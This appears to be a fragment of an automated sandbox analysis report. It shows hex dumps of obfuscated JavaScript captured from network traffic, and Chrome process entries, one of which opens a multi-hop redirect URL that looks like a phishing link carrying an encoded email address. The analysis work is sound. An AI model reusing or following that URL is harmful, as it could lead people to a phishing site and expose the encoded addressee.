                      2024-08-29 18:55:50 UTC1148INData Raw: 7a 3d 6f 77 26 26 6f 62 5b 27 6e 61 6d 65 27 5d 21 3d 3d 6f 4a 3b 28 6f 41 7c 7c 6f 7a 29 26 26 6f 4b 28 6f 54 2c 6f 4a 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 68 3d 6e 62 2c 6f 68 3d 6f 64 28 74 68 69 73 29 3b 72 65 74 75 72 6e 27 2f 27 2b 6f 52 28 6f 68 5b 6e 68 28 30 78 34 34 61 29 5d 29 2b 27 2f 27 2b 6f 52 28 6f 65 28 6f 68 29 29 3b 7d 2c 7b 27 75 6e 73 61 66 65 27 3a 21 30 78 30 7d 29 3b 7d 2c 30 78 66 39 61 3a 66 75 6e 63 74 69 6f 6e 28 6f 55 2c 6f 42 2c 6f 43 29 7b 76 61 72 20 6e 4d 3d 61 30 44 35 2c 6f 77 3d 6f 43 28 30 78 32 33 39 31 29 5b 27 63 68 61 72 41 74 27 5d 2c 6f 4b 3d 6f 43 28 30 78 31 38 37 35 29 2c 6f 64 3d 6f 43 28 30 78 31 31 38 33 29 2c 6f 52 3d 6f 43 28 30 78 31 36 31 65 29 2c 6f 6d 3d 6f 43 28 30 78 31 34 37 66 29 2c
                      Data Ascii: z=ow&&ob['name']!==oJ;(oA||oz)&&oK(oT,oJ,function(){var nh=nb,oh=od(this);return'/'+oR(oh[nh(0x44a)])+'/'+oR(oe(oh));},{'unsafe':!0x0});},0xf9a:function(oU,oB,oC){var nM=a0D5,ow=oC(0x2391)['charAt'],oK=oC(0x1875),od=oC(0x1183),oR=oC(0x161e),om=oC(0x147f),
                      2024-08-29 18:55:50 UTC16384INData Raw: 38 33 39 37 0d 0a 6e 51 28 30 78 32 66 36 29 5b 27 73 70 6c 69 74 27 5d 28 2f 28 3f 3a 29 2f 2c 2d 30 78 31 29 5b 6e 51 28 30 78 31 38 66 29 5d 7c 7c 30 78 32 21 3d 3d 27 61 62 27 5b 27 73 70 6c 69 74 27 5d 28 2f 28 3f 3a 61 62 29 2a 2f 29 5b 6e 51 28 30 78 31 38 66 29 5d 7c 7c 30 78 34 21 3d 3d 27 2e 27 5b 27 73 70 6c 69 74 27 5d 28 2f 28 2e 3f 29 28 2e 3f 29 2f 29 5b 6e 51 28 30 78 31 38 66 29 5d 7c 7c 27 2e 27 5b 6e 51 28 30 78 32 36 34 29 5d 28 2f 28 29 28 29 2f 29 5b 27 6c 65 6e 67 74 68 27 5d 3e 30 78 31 7c 7c 27 27 5b 6e 51 28 30 78 32 36 34 29 5d 28 2f 2e 3f 2f 29 5b 6e 51 28 30 78 31 38 66 29 5d 3b 6f 64 28 27 73 70 6c 69 74 27 2c 66 75 6e 63 74 69 6f 6e 28 6f 46 2c 6f 4e 2c 6f 56 29 7b 76 61 72 20 6e 50 3d 6e 51 2c 6f 79 3d 27 30 27 5b 6e 50 28
                      Data Ascii: 8397nQ(0x2f6)['split'](/(?:)/,-0x1)[nQ(0x18f)]||0x2!=='ab'['split'](/(?:ab)*/)[nQ(0x18f)]||0x4!=='.'['split'](/(.?)(.?)/)[nQ(0x18f)]||'.'[nQ(0x264)](/()()/)['length']>0x1||''[nQ(0x264)](/.?/)[nQ(0x18f)];od('split',function(oF,oN,oV){var nP=nQ,oy='0'[nP(


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:14:55:33
                      Start date:29/08/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:2
                      Start time:14:55:36
                      Start date:29/08/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2200,i,1794559140253772968,16648018370303227466,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:3
                      Start time:14:55:38
                      Start date:29/08/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Disassembly

                      No disassembly